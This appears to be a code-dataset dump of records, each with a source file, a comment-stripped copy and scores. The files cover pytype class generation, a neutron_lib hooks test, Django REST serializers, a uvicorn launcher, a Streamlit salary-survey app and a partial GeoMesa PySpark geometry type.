"""Adds a class member, returning whether it's a bare late annotation."""
if not is_late_annotation(value):
cls.members[name] = value
return False
elif orig is None:
# We are generating a class member from a bare annotation.
cls.members[name] = self.vm.convert.none.to_variable(node)
cls.late_annotations[name] = value
return True
else:
cls.members[name] = orig
return False
def get_base_class_attrs(self, cls, cls_attrs, metadata_key):
# Traverse the MRO and collect base class attributes. We only add an
# attribute if it hasn't been defined before.
base_attrs = []
taken_attr_names = {a.name for a in cls_attrs}
for base_cls in cls.mro[1:]:
if not isinstance(base_cls, mixin.Class):
continue
sub_attrs = base_cls.metadata.get(metadata_key, None)
if sub_attrs is None:
continue
for a in sub_attrs:
if a.name not in taken_attr_names:
taken_attr_names.add(a.name)
base_attrs.append(a)
return base_attrs
def call(self, node, func, args):
"""Construct a decorator, and call it on the class."""
self.match_args(node, args)
# There are two ways to use a decorator:
# @decorator(...)
# class Foo: ...
# or
# @decorator
# class Foo: ...
# In the first case, call() is invoked twice: once with kwargs to create the
# decorator object and once with the decorated class as a posarg. So we call
# update_kwargs on the first invocation, setting _current_args, and skip it
# on the second.
# In the second case, we call update_kwargs on the first and only
# invocation. (Although namedargs is empty in this case, bool(namedargs) is
# True as long as namedargs is an abstract.Dict object.)
if args.namedargs and not self._current_args:
self.update_kwargs(args)
# NOTE: @dataclass is py3-only and has explicitly kwonly args in its
# constructor.
#
# @attr.s does not take positional arguments in typical usage, but
# technically this works:
# class Foo:
# x = attr.ib()
# Foo = attr.s(Foo, **kwargs)
#
# Unfortunately, it also works to pass kwargs as posargs; we will at least
# reject posargs if the first arg is not a Callable.
if not args.posargs:
return node, self.to_variable(node)
cls_var = args.posargs[0]
# We should only have a single binding here
cls, = cls_var.data
if not isinstance(cls, mixin.Class):
# There are other valid types like abstract.Unsolvable that we don't need
# to do anything with.
return node, cls_var
self.args[cls] = self._current_args
# Reset _current_args so we don't use old args for a new class.
self._current_args = None
# decorate() modifies the cls object in place
self.decorate(node, cls)
return node, cls_var
class FieldConstructor(abstract.PyTDFunction):
"""Implements constructors for fields."""
def get_kwarg(self, args, name, default):
if name not in args.namedargs:
return default
try:
return abstract_utils.get_atomic_python_constant(args.namedargs[name])
except abstract_utils.ConversionError:
self.vm.errorlog.not_supported_yet(
self.vm.frames, "Non-constant argument %r" % name)
def get_type_from_default(self, node, default_var):
if default_var and default_var.data == [self.vm.convert.none]:
# A default of None doesn't give us any information about the actual type.
return self.vm.program.NewVariable([self.vm.convert.unsolvable],
[default_var.bindings[0]], node)
return default_var
def is_method(var):
if var is None or is_late_annotation(var):
return False
return isinstance(var.data[0], (
abstract.INTERPRETER_FUNCTION_TYPES,
special_builtins.ClassMethodInstance,
special_builtins.PropertyInstance,
special_builtins.StaticMethodInstance
))
def is_late_annotation(val):
return isinstance(val, abstract.LateAnnotation)
def is_dunder(name):
return name.startswith("__") and name.endswith("__")
|
"""Base support for generating classes from data declarations.
Contains common functionality used by dataclasses, attrs and namedtuples.
"""
import abc
import collections
import logging
from pytype import abstract
from pytype import abstract_utils
from pytype import mixin
from pytype import overlay_utils
from pytype import special_builtins
import six
log = logging.getLogger(__name__)
# type alias for convenience
Param = overlay_utils.Param
class Ordering(object):
"""Possible orderings for Decorator.get_class_locals."""
# Order by each variable's first annotation. For example, for
# class Foo:
# x: int
# y: str
# x: float
# the locals will be [(x, Instance(float)), (y, Instance(str))]. Note that
# unannotated variables will be skipped, and the values of later annotations
# take precedence over earlier ones.
FIRST_ANNOTATE = object()
# Order by each variable's last definition. So for
# class Foo:
# x = 0
# y = 'hello'
# x = 4.2
# the locals will be [(y, Instance(str)), (x, Instance(float))]. Note that
# variables without assignments will be skipped.
LAST_ASSIGN = object()
class Attribute(object):
"""Represents a class member variable.
Members:
name: field name
typ: field python type
init: Whether the field should be included in the generated __init__
default: Default value
"""
def __init__(self, name, typ, init, default):
self.name = name
self.typ = typ
self.init = init
self.default = default
def __repr__(self):
return str({"name": self.name, "typ": self.typ, "init": self.init,
"default": self.default})
@six.add_metaclass(abc.ABCMeta)
class Decorator(abstract.PyTDFunction):
"""Base class for decorators that generate classes from data declarations."""
# Defaults for the args that we support (dataclasses only support 'init',
# but the others default to false so they should not affect anything).
_DEFAULT_ARGS = {
"init": True,
"kw_only": False,
"auto_attribs": False,
}
def __init__(self, *args, **kwargs):
super(Decorator, self).__init__(*args, **kwargs)
# Decorator.call() is invoked first with args, then with the class to
# decorate, so we need to first store the args and then associate them to
# the right class.
self._current_args = None
self.args = {} # map from each class we decorate to its args
@abc.abstractmethod
def decorate(self, node, cls):
"""Apply the decorator to cls."""
def update_kwargs(self, args):
self._current_args = Decorator._DEFAULT_ARGS.copy()
for k, v in args.namedargs.items():
if k in self._current_args:
try:
self._current_args[k] = abstract_utils.get_atomic_python_constant(v)
except abstract_utils.ConversionError:
self.vm.errorlog.not_supported_yet(
self.vm.frames, "Non-constant argument to decorator: %r" % k)
def init_name(self, attr):
"""Attribute name as an __init__ keyword, could differ from attr.name."""
return attr.name
def make_init(self, node, cls, attrs):
attr_params = []
for attr in attrs:
if attr.init:
# call self.init_name in case the name differs from the field name -
# e.g. attrs removes leading underscores from attrib names when
# generating kwargs for __init__.
attr_params.append(
Param(name=self.init_name(attr),
typ=attr.typ,
default=attr.default))
# The kw_only arg is ignored in python2; using it is not an error.
if self.args[cls]["kw_only"] and self.vm.PY3:
params = []
kwonly_params = attr_params
else:
params = attr_params
kwonly_params = []
return overlay_utils.make_method(self.vm, node, "__init__", params,
kwonly_params)
def type_clash_error(self, value):
if is_late_annotation(value):
err = value.expr
else:
err = value.data[0].cls
self.vm.errorlog.invalid_annotation(self.vm.frames, err)
def get_class_locals(self, cls, allow_methods, ordering):
"""Gets a dictionary of the class's local variables.
Args:
cls: An abstract.InterpreterClass.
allow_methods: A bool, whether to allow methods as variables.
ordering: A classgen.Ordering describing the order in which the variables
should appear.
Returns:
A collections.OrderedDict of the locals.
"""
# TODO(rechen): Once we drop Python 2 support, either use a normal dict or
# replace key deletion with OrderedDict.move_to_end().
out = collections.OrderedDict()
for op in self.vm.local_ops[cls.name]:
if is_dunder(op.name):
continue
local = self.vm.annotated_locals[cls.name][op.name]
if not allow_methods and is_method(local.orig):
continue
if ordering is Ordering.FIRST_ANNOTATE:
if not op.is_annotate() or op.name in out:
continue
else:
assert ordering is Ordering.LAST_ASSIGN
if not op.is_assign():
continue
elif op.name in out:
del out[op.name]
out[op.name] = local
return out
def add_member(self, node, cls, name, value, orig):
"""Adds a class member, returning whether it's a bare late annotation."""
if not is_late_annotation(value):
cls.members[name] = value
return False
elif orig is None:
# We are generating a class member from a bare annotation.
cls.members[name] = self.vm.convert.none.to_variable(node)
cls.late_annotations[name] = value
return True
else:
cls.members[name] = orig
return False
def get_base_class_attrs(self, cls, cls_attrs, metadata_key):
# Traverse the MRO and collect base class attributes. We only add an
# attribute if it hasn't been defined before.
base_attrs = []
taken_attr_names = {a.name for a in cls_attrs}
for base_cls in cls.mro[1:]:
if not isinstance(base_cls, mixin.Class):
continue
sub_attrs = base_cls.metadata.get(metadata_key, None)
if sub_attrs is None:
continue
for a in sub_attrs:
if a.name not in taken_attr_names:
taken_attr_names.add(a.name)
base_attrs.append(a)
return base_attrs
def call(self, node, func, args):
"""Construct a decorator, and call it on the class."""
self.match_args(node, args)
# There are two ways to use a decorator:
# @decorator(...)
# class Foo: ...
# or
# @decorator
# class Foo: ...
# In the first case, call() is invoked twice: once with kwargs to create the
# decorator object and once with the decorated class as a posarg. So we call
# update_kwargs on the first invocation, setting _current_args, and skip it
# on the second.
# In the second case, we call update_kwargs on the first and only
# invocation. (Although namedargs is empty in this case, bool(namedargs) is
# True as long as namedargs is an abstract.Dict object.)
if args.namedargs and not self._current_args:
self.update_kwargs(args)
# NOTE: @dataclass is py3-only and has explicitly kwonly args in its
# constructor.
#
# @attr.s does not take positional arguments in typical usage, but
# technically this works:
# class Foo:
# x = attr.ib()
# Foo = attr.s(Foo, **kwargs)
#
# Unfortunately, it also works to pass kwargs as posargs; we will at least
# reject posargs if the first arg is not a Callable.
if not args.posargs:
return node, self.to_variable(node)
cls_var = args.posargs[0]
# We should only have a single binding here
cls, = cls_var.data
if not isinstance(cls, mixin.Class):
# There are other valid types like abstract.Unsolvable that we don't need
# to do anything with.
return node, cls_var
self.args[cls] = self._current_args
# Reset _current_args so we don't use old args for a new class.
self._current_args = None
# decorate() modifies the cls object in place
self.decorate(node, cls)
return node, cls_var
class FieldConstructor(abstract.PyTDFunction):
"""Implements constructors for fields."""
def get_kwarg(self, args, name, default):
if name not in args.namedargs:
return default
try:
return abstract_utils.get_atomic_python_constant(args.namedargs[name])
except abstract_utils.ConversionError:
self.vm.errorlog.not_supported_yet(
self.vm.frames, "Non-constant argument %r" % name)
def get_type_from_default(self, node, default_var):
if default_var and default_var.data == [self.vm.convert.none]:
# A default of None doesn't give us any information about the actual type.
return self.vm.program.NewVariable([self.vm.convert.unsolvable],
[default_var.bindings[0]], node)
return default_var
def is_method(var):
if var is None or is_late_annotation(var):
return False
return isinstance(var.data[0], (
abstract.INTERPRETER_FUNCTION_TYPES,
special_builtins.ClassMethodInstance,
special_builtins.PropertyInstance,
special_builtins.StaticMethodInstance
))
def is_late_annotation(val):
return isinstance(val, abstract.LateAnnotation)
def is_dunder(name):
return name.startswith("__") and name.endswith("__")
|
en
| 0.828614
|
Base support for generating classes from data declarations. Contains common functionality used by dataclasses, attrs and namedtuples. # type alias for convenience Possible orderings for Decorator.get_class_locals. # Order by each variable's first annotation. For example, for # class Foo: # x: int # y: str # x: float # the locals will be [(x, Instance(float)), (y, Instance(str))]. Note that # unannotated variables will be skipped, and the values of later annotations # take precedence over earlier ones. # Order by each variable's last definition. So for # class Foo: # x = 0 # y = 'hello' # x = 4.2 # the locals will be [(y, Instance(str)), (x, Instance(float))]. Note that # variables without assignments will be skipped. Represents a class member variable. Members: name: field name typ: field python type init: Whether the field should be included in the generated __init__ default: Default value Base class for decorators that generate classes from data declarations. # Defaults for the args that we support (dataclasses only support 'init', # but the others default to false so they should not affect anything). # Decorator.call() is invoked first with args, then with the class to # decorate, so we need to first store the args and then associate them to # the right class. # map from each class we decorate to its args Apply the decorator to cls. Attribute name as an __init__ keyword, could differ from attr.name. # call self.init_name in case the name differs from the field name - # e.g. attrs removes leading underscores from attrib names when # generating kwargs for __init__. # The kw_only arg is ignored in python2; using it is not an error. Gets a dictionary of the class's local variables. Args: cls: An abstract.InterpreterClass. allow_methods: A bool, whether to allow methods as variables. ordering: A classgen.Ordering describing the order in which the variables should appear. Returns: A collections.OrderedDict of the locals. # TODO(rechen): Once we drop Python 2 support, either use a normal dict or # replace key deletion with OrderedDict.move_to_end(). Adds a class member, returning whether it's a bare late annotation. # We are generating a class member from a bare annotation. # Traverse the MRO and collect base class attributes. We only add an # attribute if it hasn't been defined before. Construct a decorator, and call it on the class. # There are two ways to use a decorator: # @decorator(...) # class Foo: ... # or # @decorator # class Foo: ... # In the first case, call() is invoked twice: once with kwargs to create the # decorator object and once with the decorated class as a posarg. So we call # update_kwargs on the first invocation, setting _current_args, and skip it # on the second. # In the second case, we call update_kwargs on the first and only # invocation. (Although namedargs is empty in this case, bool(namedargs) is # True as long as namedargs is an abstract.Dict object.) # NOTE: @dataclass is py3-only and has explicitly kwonly args in its # constructor. # # @attr.s does not take positional arguments in typical usage, but # technically this works: # class Foo: # x = attr.ib() # Foo = attr.s(Foo, **kwargs) # # Unfortunately, it also works to pass kwargs as posargs; we will at least # reject posargs if the first arg is not a Callable. # We should only have a single binding here # There are other valid types like abstract.Unsolvable that we don't need # to do anything with. # Reset _current_args so we don't use old args for a new class. # decorate() modifies the cls object in place Implements constructors for fields. # A default of None doesn't give us any information about the actual type.
| 3.029289
| 3
|
neutron_lib/tests/unit/db/test_model_query.py
|
rolaya/neutron-lib
| 0
|
6628137
|
<filename>neutron_lib/tests/unit/db/test_model_query.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron_lib.db import model_query
from neutron_lib import fixture
from neutron_lib.tests import _base
from neutron_lib.utils import helpers
# TODO(boden): find a way to test other model_query functions
class TestHooks(_base.BaseTestCase):
def setUp(self):
super(TestHooks, self).setUp()
self.useFixture(fixture.DBQueryHooksFixture())
def _mock_hook(self, x):
return x
def test_register_hook(self):
mock_model = mock.Mock()
model_query.register_hook(
mock_model, 'hook1', self._mock_hook,
self._mock_hook, result_filters=self._mock_hook)
self.assertEqual(1, len(model_query._model_query_hooks.keys()))
hook_ref = helpers.make_weak_ref(self._mock_hook)
registered_hooks = model_query.get_hooks(mock_model)
self.assertEqual(1, len(registered_hooks))
for d in registered_hooks:
for k in d.keys():
self.assertEqual(hook_ref, d.get(k))
def test_register_hook_non_callables(self):
mock_model = mock.Mock()
model_query.register_hook(
mock_model, 'hook1', self._mock_hook, {}, result_filters={})
self.assertEqual(1, len(model_query._model_query_hooks.keys()))
hook_ref = helpers.make_weak_ref(self._mock_hook)
registered_hooks = model_query.get_hooks(mock_model)
self.assertEqual(1, len(registered_hooks))
for d in registered_hooks:
for k in d.keys():
if k == 'query':
self.assertEqual(hook_ref, d.get(k))
else:
self.assertEqual({}, d.get(k))
def test_get_values(self):
mock_model = mock.Mock()
mock_context = mock.Mock()
with mock.patch.object(
model_query, 'query_with_hooks') as query_with_hooks:
query_with_hooks.return_value = [['value1'], ['value2']]
values = model_query.get_values(mock_context, mock_model,
'fake_field')
self.assertEqual(['value1', 'value2'], values)
query_with_hooks.assert_called_with(
mock_context, mock_model, field='fake_field')
|
<filename>neutron_lib/tests/unit/db/test_model_query.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron_lib.db import model_query
from neutron_lib import fixture
from neutron_lib.tests import _base
from neutron_lib.utils import helpers
# TODO(boden): find a way to test other model_query functions
class TestHooks(_base.BaseTestCase):
def setUp(self):
super(TestHooks, self).setUp()
self.useFixture(fixture.DBQueryHooksFixture())
def _mock_hook(self, x):
return x
def test_register_hook(self):
mock_model = mock.Mock()
model_query.register_hook(
mock_model, 'hook1', self._mock_hook,
self._mock_hook, result_filters=self._mock_hook)
self.assertEqual(1, len(model_query._model_query_hooks.keys()))
hook_ref = helpers.make_weak_ref(self._mock_hook)
registered_hooks = model_query.get_hooks(mock_model)
self.assertEqual(1, len(registered_hooks))
for d in registered_hooks:
for k in d.keys():
self.assertEqual(hook_ref, d.get(k))
def test_register_hook_non_callables(self):
mock_model = mock.Mock()
model_query.register_hook(
mock_model, 'hook1', self._mock_hook, {}, result_filters={})
self.assertEqual(1, len(model_query._model_query_hooks.keys()))
hook_ref = helpers.make_weak_ref(self._mock_hook)
registered_hooks = model_query.get_hooks(mock_model)
self.assertEqual(1, len(registered_hooks))
for d in registered_hooks:
for k in d.keys():
if k == 'query':
self.assertEqual(hook_ref, d.get(k))
else:
self.assertEqual({}, d.get(k))
def test_get_values(self):
mock_model = mock.Mock()
mock_context = mock.Mock()
with mock.patch.object(
model_query, 'query_with_hooks') as query_with_hooks:
query_with_hooks.return_value = [['value1'], ['value2']]
values = model_query.get_values(mock_context, mock_model,
'fake_field')
self.assertEqual(['value1', 'value2'], values)
query_with_hooks.assert_called_with(
mock_context, mock_model, field='fake_field')
|
en
| 0.840918
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # TODO(boden): find a way to test other model_query functions
| 2.090712
| 2
|
go_and_do_people_info/serializers.py
|
capitalChurch/GoDoBackend
| 1
|
6628138
|
<filename>go_and_do_people_info/serializers.py<gh_stars>1-10
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group, User
from go_and_do_people_info.models import (Country, Event, Ministry, News,
Prayer, Ticket, UserProfile,
Volunteer)
from phonenumber_field import serializerfields
from rest_auth.registration.serializers import RegisterSerializer
from rest_framework import serializers
from rest_framework.validators import UniqueTogetherValidator
User = get_user_model()
class CustomRegisterSerializer(RegisterSerializer):
email = serializers.EmailField(required=True)
password1 = serializers.CharField(write_only=True)
first_name = serializers.CharField(write_only=True)
last_name = serializers.CharField(write_only=True)
def get_cleaned_data(self):
super(CustomRegisterSerializer, self).get_cleaned_data()
return {
'password1': self.validated_data.get('password1', ''),
'email': self.validated_data.get('email', ''),
'first_name': self.validated_data.get('first_name', ''),
'last_name': self.validated_data.get('last_name', ''),
}
class CustomUserDetailsSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('email','first_name', 'last_name')
read_only_fields = ('email',)
class UserSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = get_user_model()
fields = [
'url',
'first_name',
'last_name',
'email',
'is_staff',
'is_active',
'groups',
]
class UserProfileSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = UserProfile
fields = [
'url',
'user',
'date_of_birth',
'gender',
'phone_number',
'mobile_number',
'zip_code',
'street',
'district',
'city',
'state',
'date_joined',
'avatar',
]
class MinistrySerializer(serializers.ModelSerializer):
class Meta:
model = Ministry
fields = ['url', 'name', 'info']
class VolunteerSerializer(serializers.HyperlinkedModelSerializer):
member = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
ministry = serializers.PrimaryKeyRelatedField(queryset=Ministry.objects.all(), many=False, read_only=False, help_text='Field documentation!')
class Meta:
model = Volunteer
fields = ['url', 'member', 'ministry', 'is_leader']
validators = [
UniqueTogetherValidator(
queryset=Volunteer.objects.all(),
fields=['member', 'ministry']
)
]
class CountrySerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Country
fields = ['url', 'name']
class PrayerSerializer(serializers.HyperlinkedModelSerializer):
user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
country = serializers.PrimaryKeyRelatedField(queryset=Country.objects.all(), many=False, read_only=False, help_text='Field documentation!')
class Meta:
model = Prayer
fields = ['url', 'timestamp', 'user', 'country']
validators = [
UniqueTogetherValidator(
queryset=Prayer.objects.all(),
fields=['timestamp', 'user', 'country']
)
]
class NewsSerializer(serializers.HyperlinkedModelSerializer):
author = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
country = serializers.PrimaryKeyRelatedField(queryset=Country.objects.all(), many=False, read_only=False, help_text='Field documentation!')
class Meta:
model = News
fields = ['url', 'title', 'text', 'timestamp', 'author', 'country']
validators = [
UniqueTogetherValidator(
queryset=News.objects.all(),
fields=['title', 'text', 'timestamp', 'author', 'country']
)
]
class EventSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Event
fields = ['url', 'name', 'datetime', 'description', 'venue']
class TicketSerializer(serializers.HyperlinkedModelSerializer):
user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
event = serializers.PrimaryKeyRelatedField(queryset=Event.objects.all(), many=False, read_only=False, help_text='Field documentation!')
class Meta:
model = Ticket
fields = ['url', 'title', 'user', 'event', 'ticket_id', 'purchase_date', 'modified', 'price']
validators = [
UniqueTogetherValidator(
queryset=Ticket.objects.all(),
fields=['title', 'event', 'ticket_id']
)
]
|
<filename>go_and_do_people_info/serializers.py<gh_stars>1-10
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group, User
from go_and_do_people_info.models import (Country, Event, Ministry, News,
Prayer, Ticket, UserProfile,
Volunteer)
from phonenumber_field import serializerfields
from rest_auth.registration.serializers import RegisterSerializer
from rest_framework import serializers
from rest_framework.validators import UniqueTogetherValidator
User = get_user_model()
class CustomRegisterSerializer(RegisterSerializer):
email = serializers.EmailField(required=True)
password1 = serializers.CharField(write_only=True)
first_name = serializers.CharField(write_only=True)
last_name = serializers.CharField(write_only=True)
def get_cleaned_data(self):
super(CustomRegisterSerializer, self).get_cleaned_data()
return {
'password1': self.validated_data.get('password1', ''),
'email': self.validated_data.get('email', ''),
'first_name': self.validated_data.get('first_name', ''),
'last_name': self.validated_data.get('last_name', ''),
}
class CustomUserDetailsSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('email','first_name', 'last_name')
read_only_fields = ('email',)
class UserSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = get_user_model()
fields = [
'url',
'first_name',
'last_name',
'email',
'is_staff',
'is_active',
'groups',
]
class UserProfileSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = UserProfile
fields = [
'url',
'user',
'date_of_birth',
'gender',
'phone_number',
'mobile_number',
'zip_code',
'street',
'district',
'city',
'state',
'date_joined',
'avatar',
]
class MinistrySerializer(serializers.ModelSerializer):
class Meta:
model = Ministry
fields = ['url', 'name', 'info']
class VolunteerSerializer(serializers.HyperlinkedModelSerializer):
member = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
ministry = serializers.PrimaryKeyRelatedField(queryset=Ministry.objects.all(), many=False, read_only=False, help_text='Field documentation!')
class Meta:
model = Volunteer
fields = ['url', 'member', 'ministry', 'is_leader']
validators = [
UniqueTogetherValidator(
queryset=Volunteer.objects.all(),
fields=['member', 'ministry']
)
]
class CountrySerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Country
fields = ['url', 'name']
class PrayerSerializer(serializers.HyperlinkedModelSerializer):
user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
country = serializers.PrimaryKeyRelatedField(queryset=Country.objects.all(), many=False, read_only=False, help_text='Field documentation!')
class Meta:
model = Prayer
fields = ['url', 'timestamp', 'user', 'country']
validators = [
UniqueTogetherValidator(
queryset=Prayer.objects.all(),
fields=['timestamp', 'user', 'country']
)
]
class NewsSerializer(serializers.HyperlinkedModelSerializer):
author = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
country = serializers.PrimaryKeyRelatedField(queryset=Country.objects.all(), many=False, read_only=False, help_text='Field documentation!')
class Meta:
model = News
fields = ['url', 'title', 'text', 'timestamp', 'author', 'country']
validators = [
UniqueTogetherValidator(
queryset=News.objects.all(),
fields=['title', 'text', 'timestamp', 'author', 'country']
)
]
class EventSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Event
fields = ['url', 'name', 'datetime', 'description', 'venue']
class TicketSerializer(serializers.HyperlinkedModelSerializer):
user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
event = serializers.PrimaryKeyRelatedField(queryset=Event.objects.all(), many=False, read_only=False, help_text='Field documentation!')
class Meta:
model = Ticket
fields = ['url', 'title', 'user', 'event', 'ticket_id', 'purchase_date', 'modified', 'price']
validators = [
UniqueTogetherValidator(
queryset=Ticket.objects.all(),
fields=['title', 'event', 'ticket_id']
)
]
|
none
| 1
| 2.156624
| 2
|
|
main.py
|
ranking-agent/aragorn
| 1
|
6628139
|
#!/usr/bin/env python
# from gunicorn.app.wsgiapp import WSGIApplication
#
# # --bind 0.0.0.0:8080 -w 1 -k uvicorn.workers.UvicornWorker -t 600 src.server:APP
# app = WSGIApplication()
#
# app.run()
import uvicorn
class App:
...
app = App()
if __name__ == "__main__":
uvicorn.run("src.server:APP", host="127.0.0.1", port=5000, log_level="info", log_config="logging_setup.yml")
|
#!/usr/bin/env python
# from gunicorn.app.wsgiapp import WSGIApplication
#
# # --bind 0.0.0.0:8080 -w 1 -k uvicorn.workers.UvicornWorker -t 600 src.server:APP
# app = WSGIApplication()
#
# app.run()
import uvicorn
class App:
...
app = App()
if __name__ == "__main__":
uvicorn.run("src.server:APP", host="127.0.0.1", port=5000, log_level="info", log_config="logging_setup.yml")
|
en
| 0.22995
|
#!/usr/bin/env python # from gunicorn.app.wsgiapp import WSGIApplication # # # --bind 0.0.0.0:8080 -w 1 -k uvicorn.workers.UvicornWorker -t 600 src.server:APP # app = WSGIApplication() # # app.run()
| 2.18293
| 2
|
explore_page.py
|
Oreoluwa1234/Salary-Prediction-Project
| 0
|
6628140
|
import streamlit as st
import pandas as pd
import matplotlib.pyplot as plt
def shorten_categories(categories,cutoff):
categorical_map={}
for i in range(len(categories)):
if categories.values[i]>=cutoff:
categorical_map[categories.index[i]] =categories.index[i]
else:
categorical_map[categories.index[i]]='Other'
return categorical_map
def clean_experience(x):
if x=='More than 50 years':
return 50
if x=='Less than 1 year':
return 0.5
return float (x)
def clean_education(x):
if 'Bachelor’s degree'in x:
return 'Bachelor’s degree'
if 'Master’s degree' in x:
return 'Master’s degree'
if 'Professional degree'in x or 'Other doctoral degree' in x:
return 'Post grad'
return 'Less than a bachelor'
@st.cache
def load_data():
survey=pd.read_csv('survey_results_public.zip' ,compression='zip', header=0, sep=',', quotechar='"')
survey=survey[['Country','EdLevel','YearsCodePro','Employment','ConvertedComp']]
survey=survey.rename({'ConvertedComp':'Salary'},axis=1)
survey=survey[survey['Salary'].notnull()]
survey=survey.dropna()
survey=survey.drop('Employment',axis=1)
country_map=shorten_categories(survey.Country.value_counts(),400)
survey['Country']=survey['Country'].map(country_map)
survey=survey[survey['Salary'] <=250000]
survey=survey[survey['Salary'] >=10000]
survey=survey[survey['Salary'] !='Others']
survey['YearsCodePro']= survey['YearsCodePro'].apply(clean_experience)
survey['EdLevel']= survey['EdLevel'].apply(clean_education)
return survey
survey=load_data()
def show_explore_page():
st.title("Data Scientist Salary prediction")
st.write("""
### Stack Overflow Developer Survey 2022
# """
)
data=survey['Country'].value_counts()
fig1,ax1=plt.subplots()
ax1.pie(data,labels=data.index,shadow=True,startangle=90)
ax1.axis=('equal')#Equal aspect ratio ensures that pie is drawn as a circle
st.write("""#### Number of Data from different countries""")
st.pyplot(fig1)
st.write(
"""
#### Mean Salary based on country
"""
)
data=survey.groupby(['Country']) ["Salary"].mean().sort_values(ascending=True)
st.bar_chart(data)
st.write(
"""
#### Mean Salary Based on Experience
"""
)
data=survey.groupby(['YearsCodePro'])['Salary'].mean().sort_values(ascending=True)
st.line_chart(data)
|
import streamlit as st
import pandas as pd
import matplotlib.pyplot as plt
def shorten_categories(categories,cutoff):
categorical_map={}
for i in range(len(categories)):
if categories.values[i]>=cutoff:
categorical_map[categories.index[i]] =categories.index[i]
else:
categorical_map[categories.index[i]]='Other'
return categorical_map
def clean_experience(x):
if x=='More than 50 years':
return 50
if x=='Less than 1 year':
return 0.5
return float (x)
def clean_education(x):
if 'Bachelor’s degree'in x:
return 'Bachelor’s degree'
if 'Master’s degree' in x:
return 'Master’s degree'
if 'Professional degree'in x or 'Other doctoral degree' in x:
return 'Post grad'
return 'Less than a bachelor'
@st.cache
def load_data():
survey=pd.read_csv('survey_results_public.zip' ,compression='zip', header=0, sep=',', quotechar='"')
survey=survey[['Country','EdLevel','YearsCodePro','Employment','ConvertedComp']]
survey=survey.rename({'ConvertedComp':'Salary'},axis=1)
survey=survey[survey['Salary'].notnull()]
survey=survey.dropna()
survey=survey.drop('Employment',axis=1)
country_map=shorten_categories(survey.Country.value_counts(),400)
survey['Country']=survey['Country'].map(country_map)
survey=survey[survey['Salary'] <=250000]
survey=survey[survey['Salary'] >=10000]
survey=survey[survey['Salary'] !='Others']
survey['YearsCodePro']= survey['YearsCodePro'].apply(clean_experience)
survey['EdLevel']= survey['EdLevel'].apply(clean_education)
return survey
survey=load_data()
def show_explore_page():
st.title("Data Scientist Salary prediction")
st.write("""
### Stack Overflow Developer Survey 2022
# """
)
data=survey['Country'].value_counts()
fig1,ax1=plt.subplots()
ax1.pie(data,labels=data.index,shadow=True,startangle=90)
ax1.axis=('equal')#Equal aspect ratio ensures that pie is drawn as a circle
st.write("""#### Number of Data from different countries""")
st.pyplot(fig1)
st.write(
"""
#### Mean Salary based on country
"""
)
data=survey.groupby(['Country']) ["Salary"].mean().sort_values(ascending=True)
st.bar_chart(data)
st.write(
"""
#### Mean Salary Based on Experience
"""
)
data=survey.groupby(['YearsCodePro'])['Salary'].mean().sort_values(ascending=True)
st.line_chart(data)
|
en
| 0.813385
|
### Stack Overflow Developer Survey 2022
# #Equal aspect ratio ensures that pie is drawn as a circle #### Number of Data from different countries #### Mean Salary based on country #### Mean Salary Based on Experience
| 3.391448
| 3
|
geomesa-spark/geomesa_pyspark/src/main/python/geomesa_pyspark/types.py
|
khobbs-ccri/geomesa
| 1,197
|
6628141
|
<filename>geomesa-spark/geomesa_pyspark/src/main/python/geomesa_pyspark/types.py
from pyspark.sql.types import UserDefinedType, StructField, BinaryType, StructType
from shapely import wkb
from shapely.geometry import LineString, MultiLineString, MultiPoint, MultiPolygon, Point, Polygon
from shapely.geometry.base import BaseGeometry
from shapely.geometry.collection import GeometryCollection
class ShapelyGeometryUDT(UserDefinedType):
@classmethod
def sqlType(cls):
return StructType([StructField("wkb", BinaryType(), True)])
@classmethod
def module(cls):
return 'geomesa_pyspark.types'
@classmethod
def scalaUDT(cls):
return 'org.apache.spark.sql.jts.' + cls.__name__
def serialize(self, obj):
